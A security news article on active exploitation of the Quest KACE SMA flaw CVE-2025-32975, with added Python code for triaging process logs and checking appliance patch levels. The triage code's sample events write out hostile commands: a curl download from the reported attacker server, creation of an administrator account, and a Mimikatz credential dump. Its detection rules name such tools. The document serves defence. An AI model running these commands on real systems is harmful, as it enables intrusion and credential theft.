Hackers Actively Abusing CVE‑2025‑32975 to Compromise Unpatched Quest KACE SMA Systems

Threat actors are believed to be actively exploiting a critical vulnerability affecting the Quest KACE Systems Management Appliance (SMA), according to findings from Arctic Wolf.

The cybersecurity firm reported observing suspicious activity beginning the week of March 9, 2026, across customer environments that aligns with exploitation of CVE‑2025‑32975 on unpatched, internet‑exposed SMA instances. At this time, the attackers’ ultimate objectives remain unclear.

Tracked as CVE‑2025‑32975 with a CVSS score of 10.0, the flaw is an authentication bypass vulnerability that enables attackers to impersonate legitimate users without valid credentials. Successful exploitation could allow full compromise of administrative accounts. Quest released patches for the issue in May 2025.

Based on Arctic Wolf’s analysis, threat actors appear to have leveraged the vulnerability to gain administrative access and remotely execute commands. This included downloading Base64‑encoded payloads from an external server (216.126.225[.]156) using the curl utility.

Following initial access, the attackers reportedly created additional administrative accounts using runkbot.exe, a background process tied to the SMA Agent that facilitates script execution and software management. Investigators also observed Windows Registry changes made via PowerShell, suggesting attempts to establish persistence or alter system behavior.

Additional malicious activity attributed to the attackers includes:

  • Harvesting credentials using Mimikatz
  • Conducting reconnaissance by enumerating logged‑in users and administrator groups, and executing commands such as net time and net group
  • Gaining RDP access to backup systems (including Veeam and Veritas) and domain controllers
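As an added illustration (not code from the article or from the Arctic Wolf report), the following Python snippet shows how a defender might triage process-creation telemetry for the behaviours described above: a curl download from the reported server, account creation spawned by the SMA agent process, a PowerShell registry change, credential-dumping tool usage, and net-based reconnaissance. The event records, hostnames, paths and rule names are constructed for this example; the only page-derived indicator is the download server address, which the article prints defanged and the code refangs.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# The article prints the download server defanged; refang it so it can be
# compared against real telemetry. This is the only indicator taken from the page.
REPORTED_DOWNLOAD_HOST = "216.126.225[.]156".replace("[.]", ".")


@dataclass(frozen=True)
class Rule:
    """A detection rule: a tag, a regex over the command line and, optionally,
    a regex the parent process image must also satisfy."""
    tag: str
    cmd: "re.Pattern[str]"
    parent: Optional["re.Pattern[str]"] = None

    def matches(self, event: dict) -> bool:
        if not self.cmd.search(event["cmd"]):
            return False
        return self.parent is None or bool(self.parent.search(event["parent"]))


# Rules written from the behaviours the article attributes to the intrusion.
# Matching on module syntax (sekurlsa::) rather than only the binary name
# survives a renamed credential-dumping executable.
RULES = [
    Rule("curl_download_from_reported_host",
         re.compile(r"\bcurl(?:\.exe)?\b.*" + re.escape(REPORTED_DOWNLOAD_HOST), re.I)),
    Rule("account_creation_spawned_by_sma_agent",
         re.compile(r"\bnet1?\s+(?:user|localgroup)\b.*\s/add\b", re.I),
         re.compile(r"\\runkbot\.exe$", re.I)),
    Rule("powershell_registry_modification",
         re.compile(r"powershell.*(?:Set-ItemProperty|New-ItemProperty|reg(?:\.exe)?\s+add)\b", re.I)),
    Rule("credential_dumping_tool",
         re.compile(r"mimikatz|sekurlsa::", re.I)),
    Rule("domain_recon_net_commands",
         re.compile(r"\bnet1?\s+(?:time|group)\b", re.I)),
]

# Constructed process-creation events (Sysmon Event ID 1 shape, reduced to the
# fields the rules need). Not real logs from the incident; the agent install
# path is an assumption, and the rules only look at the file name anyway.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\ProgramData\Quest\KACE\runkbot.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl.exe -s http://216.126.225.156/stage.b64 -o C:\\Windows\\Temp\\stage.b64"},
    {"id": 2, "parent": r"C:\ProgramData\Quest\KACE\runkbot.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c net user kacesvc <pw> /add && net localgroup administrators kacesvc /add"},
    {"id": 3, "parent": r"C:\ProgramData\Quest\KACE\runkbot.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -nop -c "Set-ItemProperty -Path HKLM:\\SOFTWARE\\Example -Name x -Value 1"'},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Temp\m.exe",  # renamed binary; caught by module syntax
     "cmd": 'm.exe "sekurlsa::logonpasswords" exit'},
    {"id": 5, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\net.exe",
     "cmd": 'net group "Domain Admins" /domain'},
    {"id": 6, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl.exe -s https://updates.example.com/manifest.json"},  # benign: other host
]


def triage(events: List[dict]) -> Dict[int, List[str]]:
    """Return {event id: [matching rule tags]} for every event at least one rule hits."""
    hits: Dict[int, List[str]] = {}
    for ev in events:
        tags = [r.tag for r in RULES if r.matches(ev)]
        if tags:
            hits[ev["id"]] = tags
    return hits


if __name__ == "__main__":
    for event_id, tags in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(tags)}")
```

Each rule maps to one sentence of the reporting above, so a hit can be read back to the behaviour it represents; a plain curl to an unrelated host (event 6) is deliberately left unflagged to keep the download rule tied to the reported server rather than to curl usage in general.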

To mitigate risk, administrators are strongly advised to apply the latest security updates immediately and avoid exposing SMA systems directly to the internet. The vulnerability has been remediated in the following versions:

  • 13.0.385
  • 13.1.81
  • 13.2.183
  • 14.0.341 (Patch 5)
  • 14.1.101 (Patch 4)
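As an added check (not code from the article or from Quest), this Python snippet turns the fixed-version list above into an inventory test: it parses version strings such as "14.0.341 (Patch 5)", compares the build number against the fixed build for the same release branch, and reports branches the list does not cover as unknown instead of guessing. The hostnames and versions in SAMPLE_INVENTORY are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple

# Fixed versions listed in the article, keyed by release branch (major, minor).
# The "(Patch N)" labels are informational and do not take part in the comparison.
FIXED_BUILDS: Dict[Tuple[int, int], int] = {
    (13, 0): 385,
    (13, 1): 81,
    (13, 2): 183,
    (14, 0): 341,
    (14, 1): 101,
}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Tuple[int, int, int]:
    """Extract major.minor.build from strings like '14.0.341 (Patch 5)'."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no version number found in {text!r}")
    major, minor, build = (int(g) for g in m.groups())
    return major, minor, build


def is_patched(version: str) -> Optional[bool]:
    """True if the build is at or above the fixed build for its branch, False if
    below, None if the branch is not one the article lists (check the vendor advisory)."""
    major, minor, build = parse_version(version)
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        return None
    return build >= fixed


def patch_report(inventory: Dict[str, str]) -> Dict[str, List[str]]:
    """Group appliance hostnames by patch status for the CVE-2025-32975 fixes."""
    report: Dict[str, List[str]] = {"patched": [], "vulnerable": [], "unknown_branch": []}
    for host, version in inventory.items():
        status = is_patched(version)
        if status is None:
            report["unknown_branch"].append(host)
        elif status:
            report["patched"].append(host)
        else:
            report["vulnerable"].append(host)
    return report


# Constructed sample inventory: hostnames and versions are illustrative only.
SAMPLE_INVENTORY = {
    "kace-prod": "14.0.341 (Patch 5)",
    "kace-dr": "14.0.300",
    "kace-lab": "13.2.183",
    "kace-old": "12.1.160",
    "kace-eu": "13.1.50",
}


if __name__ == "__main__":
    for status, hosts in patch_report(SAMPLE_INVENTORY).items():
        print(f"{status}: {', '.join(hosts) or '-'}")
```

A branch outside the five listed (here the constructed 12.1 entry) is reported separately rather than marked safe, because the article says nothing about it; a patched build still needs the second recommendation applied, namely not exposing the appliance directly to the internet.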
